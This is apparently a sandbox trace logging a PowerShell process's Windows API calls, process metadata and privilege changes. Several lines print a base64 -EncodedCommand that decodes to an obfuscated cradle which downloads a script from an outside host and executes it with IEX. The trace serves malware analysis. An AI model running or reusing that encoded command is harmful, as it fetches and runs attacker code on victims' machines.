	[0351.067] CoTaskMemFree (pv=0x100430) 
	[0351.080] CoTaskMemAlloc (cb=0x3b) returned 0x1b922050
	[0351.080] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c92e4f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c92e4f8) returned 0x4550
	[0351.081] CoTaskMemFree (pv=0x1b922050) 
	[0351.084] GetConsoleWindow () returned 0x10242
	[0351.092] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0351.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0351.092] CoTaskMemFree (pv=0x100430) 
	[0351.093] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0351.093] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0351.093] CoTaskMemFree (pv=0x100430) 
	[0351.395] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0351.395] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0351.395] CoTaskMemFree (pv=0x100430) 
	[0351.397] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c92e540 | out: pNumArgs=0x1c92e540) returned 0x1b930c90*=""
	[0351.398] lstrlenW (lpString="-EncodedCommand") returned 15
	[0351.399] CoTaskMemAlloc (cb=0x22) returned 0x1b922870
	[0351.399] RtlMoveMemory (in: Destination=0x1b922870, Source=0x1b930cb2, Length=0x20 | out: Destination=0x1b922870) 
	[0351.399] CoTaskMemFree (pv=0x1b922870) 
	[0351.399] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0351.399] CoTaskMemAlloc (cb=0x2f4) returned 0x1044e0
	[0351.399] RtlMoveMemory (in: Destination=0x1044e0, Source=0x1b930cd2, Length=0x2f2 | out: Destination=0x1044e0) 
	[0351.399] CoTaskMemFree (pv=0x1044e0) 
	[0351.399] LocalFree (hMem=0x1b930c90) returned 0x0
	[0351.400] CoTaskMemAlloc (cb=0x804) returned 0x1b92acc0
	[0351.400] GetConsoleTitleW (in: lpConsoleTitle=0x1b92acc0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0351.400] CoTaskMemFree (pv=0x1b92acc0) 
	[0351.407] CoTaskMemAlloc (cb=0x38e) returned 0x1b92acc0
	[0351.407] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c92e4a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30d24c0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30d24c0*(hProcess=0x2e0, hThread=0x36c, dwProcessId=0xef4, dwThreadId=0x784)) returned 1
	[0351.490] CoTaskMemFree (pv=0x1b92acc0) 
	[0351.491] CloseHandle (hObject=0x36c) returned 1
	[0351.491] CoTaskMemAlloc (cb=0x3b) returned 0x1b922050
	[0351.491] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c92e548, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c92e548) returned 0x4550
	[0351.492] CoTaskMemFree (pv=0x1b922050) 
	[0351.495] GetCurrentProcess () returned 0xffffffffffffffff
	[0351.495] GetCurrentProcess () returned 0xffffffffffffffff
	[0351.496] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c92e628, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c92e628*=0x36c) returned 1

Process:
	id = "21"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2e22d000"
	os_pid = "0x640"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 116
	os_tid = 0xa88

	[0309.046] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0310.851] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0310.852] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0310.852] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0310.852] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0319.929] GetVersionExW (in: lpVersionInformation=0xcdc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.931] GetVersionExW (in: lpVersionInformation=0xcdc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0319.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0319.943] GetVersionExW (in: lpVersionInformation=0xcd970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0319.944] SetErrorMode (uMode=0x1) returned 0x1
	[0319.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdad0 | out: lpFileInformation=0xcdad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0319.946] SetErrorMode (uMode=0x1) returned 0x1
	[0319.949] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdd40 | out: lpdwHandle=0xcdd40) returned 0x94c
	[0319.951] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a972d8 | out: lpData=0x2a972d8) returned 1
	[0319.954] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdcb8, puLen=0xcdcb0 | out: lplpBuffer=0xcdcb8*=0x2a97374, puLen=0xcdcb0) returned 1
	[0319.956] lstrlenW (lpString="䅁") returned 1
	[0320.402] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a97450, puLen=0xcdc20) returned 1
	[0320.403] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0320.405] CoTaskMemAlloc (cb=0x2e) returned 0x3202d0
	[0320.405] lstrcpyW (in: lpString1=0x3202d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0320.406] CoTaskMemFree (pv=0x3202d0) 
	[0320.407] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a974a4, puLen=0xcdc20) returned 1
	[0320.407] lstrlenW (lpString="System.Management.Automation") returned 28
	[0320.407] CoTaskMemAlloc (cb=0x3c) returned 0x2d4c60
	[0320.407] lstrcpyW (in: lpString1=0x2d4c60, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0320.407] CoTaskMemFree (pv=0x2d4c60) 
	[0320.407] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a97500, puLen=0xcdc20) returned 1
	[0320.407] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0320.407] CoTaskMemAlloc (cb=0x20) returned 0x361190
	[0320.407] lstrcpyW (in: lpString1=0x361190, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0320.407] CoTaskMemFree (pv=0x361190) 
	[0320.407] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a97540, puLen=0xcdc20) returned 1
	[0320.407] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0320.407] CoTaskMemAlloc (cb=0x44) returned 0x2d4c60
	[0320.407] lstrcpyW (in: lpString1=0x2d4c60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0320.407] CoTaskMemFree (pv=0x2d4c60) 
	[0320.407] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a975a8, puLen=0xcdc20) returned 1
	[0320.407] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0320.407] CoTaskMemAlloc (cb=0x76) returned 0x3043d0
	[0320.407] lstrcpyW (in: lpString1=0x3043d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0320.407] CoTaskMemFree (pv=0x3043d0) 
	[0320.407] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a97644, puLen=0xcdc20) returned 1
	[0320.407] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0320.407] CoTaskMemAlloc (cb=0x44) returned 0x2d4c60
	[0320.407] lstrcpyW (in: lpString1=0x2d4c60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0320.407] CoTaskMemFree (pv=0x2d4c60) 
	[0320.407] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a976a8, puLen=0xcdc20) returned 1
	[0320.407] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0320.407] CoTaskMemAlloc (cb=0x58) returned 0x2cd710
	[0320.407] lstrcpyW (in: lpString1=0x2cd710, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0320.407] CoTaskMemFree (pv=0x2cd710) 
	[0320.408] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a97724, puLen=0xcdc20) returned 1
	[0320.408] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0320.408] CoTaskMemAlloc (cb=0x20) returned 0x361190
	[0320.408] lstrcpyW (in: lpString1=0x361190, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0320.408] CoTaskMemFree (pv=0x361190) 
	[0320.408] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x2a973cc, puLen=0xcdc20) returned 1
	[0320.408] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0320.408] CoTaskMemAlloc (cb=0x66) returned 0x359180
	[0320.408] lstrcpyW (in: lpString1=0x359180, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0320.408] CoTaskMemFree (pv=0x359180) 
	[0320.408] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x0, puLen=0xcdc20) returned 0
	[0320.408] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x0, puLen=0xcdc20) returned 0
	[0320.408] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdc28, puLen=0xcdc20 | out: lplpBuffer=0xcdc28*=0x0, puLen=0xcdc20) returned 0
	[0320.408] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdbf8, puLen=0xcdbf0 | out: lplpBuffer=0xcdbf8*=0x2a97374, puLen=0xcdbf0) returned 1
	[0320.409] CoTaskMemAlloc (cb=0x204) returned 0x309740
	[0320.409] VerLanguageNameW (in: wLang=0x0, szLang=0x309740, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0320.410] CoTaskMemFree (pv=0x309740) 
	[0320.410] VerQueryValueW (in: pBlock=0x2a972d8, lpSubBlock="\\", lplpBuffer=0xcdc48, puLen=0xcdc40 | out: lplpBuffer=0xcdc48*=0x2a97300, puLen=0xcdc40) returned 1
	[0320.416] GetCurrentProcessId () returned 0x640
	[0320.431] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xccb70 | out: lpLuid=0xccb70*(LowPart=0x14, HighPart=0)) returned 1
	[0320.804] GetCurrentProcess () returned 0xffffffffffffffff
	[0320.805] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccb90 | out: TokenHandle=0xccb90*=0x2ec) returned 1
	[0320.806] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2a9ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0320.807] CloseHandle (hObject=0x2ec) returned 1
	[0320.811] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x2ec
	[0320.836] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2a9abb8, cb=0x200, lpcbNeeded=0xcdba8 | out: lphModule=0x2a9abb8, lpcbNeeded=0xcdba8) returned 1
	[0320.839] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2a9ae28, cb=0x18 | out: lpmodinfo=0x2a9ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0320.840] CoTaskMemAlloc (cb=0x804) returned 0x3671f0
	[0320.840] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x3671f0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0320.840] CoTaskMemFree (pv=0x3671f0) 
	[0320.841] CoTaskMemAlloc (cb=0x804) returned 0x3671f0
	[0320.841] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x3671f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0320.841] CoTaskMemFree (pv=0x3671f0) 
	[0320.842] CloseHandle (hObject=0x2ec) returned 1
	[0320.850] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x640) returned 0x2ec
	[0320.851] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xcdcd8 | out: lpExitCode=0xcdcd8*=0x103) returned 1
	[0320.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12a9b088, Length=0x20000, ResultLength=0xcdca0 | out: SystemInformation=0x12a9b088, ResultLength=0xcdca0*=0x17af8) returned 0x0
	[0321.295] EnumWindows (lpEnumFunc=0x27266ac, lParam=0x0) returned 1
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x558
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x538
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x778
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x778
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.296] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x460
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x4d0
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xd94
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xd74
	[0321.297] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xd00
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xcd8
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xc84
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xca4
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xc64
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xc24
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xb84
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xbac
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x384
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xab8
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x33c
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa44
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xa64
	[0321.298] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0x8a8
	[0321.299] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcda00 | out: lpdwProcessId=0xcda00) returned 0xaf0
